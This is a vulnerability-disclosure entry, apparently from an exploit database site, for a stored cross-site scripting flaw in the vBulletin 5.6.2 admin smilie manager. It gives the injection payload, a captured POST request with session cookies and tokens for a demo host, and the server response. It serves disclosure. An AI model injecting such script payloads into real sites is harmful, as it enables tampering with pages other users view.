vBulletin 5.6.2 Persistent Cross Site Scripting

2020.08.20
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: vBulletin 5.6.2 Stored XSS # Date:15.08.2020 # Author: Vincent666 ibn Winnie # Software Link: https://www.vbulletin.com/en/features/ # Tested on: Windows 10 # Web Browser: Mozilla Firefox # Blog : https://pentest-vincent.blogspot.com/ # PoC: https://pentest-vincent.blogspot.com/2020/08/vbulletin-562-stored-xss.html PoC: Go to the Admin panel -> open Smilies -> Smilies manager->Edit Smilie Categories->edit Smile: https://72329406fb3a-041342.demo.vbulletin.net/admincp/index.php https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=edit&table=smilie&id=1&pp=20&page=1&imagecategoryid=4 Put our code in the field "Title" or "Text to Replace" and other fields. Our code: ""><script>alert("field")</script><marquee>test</marquee> And save this. We have a stored XSS and html code injection. Picture: https://imgur.com/a/JUsmPye Video: https://www.youtube.com/watch?v=D526ZLgH90Y&feature=youtu.be https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=update Host: 72329406fb3a-041342.demo.vbulletin.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 399 Origin: https://72329406fb3a-041342.demo.vbulletin.net Connection: keep-alive Referer: https://72329406fb3a-041342.demo.vbulletin.net/admincp/image.php?do=edit&table=smilie&id=1&pp=20&page=1&imagecategoryid=4 Cookie: vb41342lastvisit=1597392323; vb41342lastactivity=1597521919; vb41342np_notices_displayed=; vb41342contentlist_perpage=25; vb41342sessionhash=845f579d01bdd42b4bf3020d4893f366; PHPSESSID=d8cafaa942534428ce54ea2ba5a221ec7ed9532a6d9666b8; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41342cpsession=18ca6bf5d79e5564ac2aa3a201612500; vb41342sitebuilder_active=1 Upgrade-Insecure-Requests: 1 s=845f579d01bdd42b4bf3020d4893f366&do=update&adminhash=38c14dd475e4de2e3f95676226993ebd&securitytoken=1597523664-7fba45cf7add9630b2fda3e409ad0da7beec797c&title=Smile""><script>alert("field")</script><marquee>test</marquee>&smilietext=:)&imagespath=smile.png&imagecategoryid=4&displayorder=1&id=1&table=smilie&page=1&perpage=20&massmove=0&returnimagecategoryid=4 POST: HTTP/1.1 200 OK Date: Sat, 15 Aug 2020 20:34:36 GMT X-Frame-Options: sameorigin Content-Security-Policy: frame-ancestors 'self' Expires: 0 Cache-Control: private, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Connection: keep-alive, Keep-Alive Keep-Alive: timeout=2, max=100 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 p.s. Today i haven't idea how to use this bug, because only the admin user has an access to the admincp and can insert xss code in the fields.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top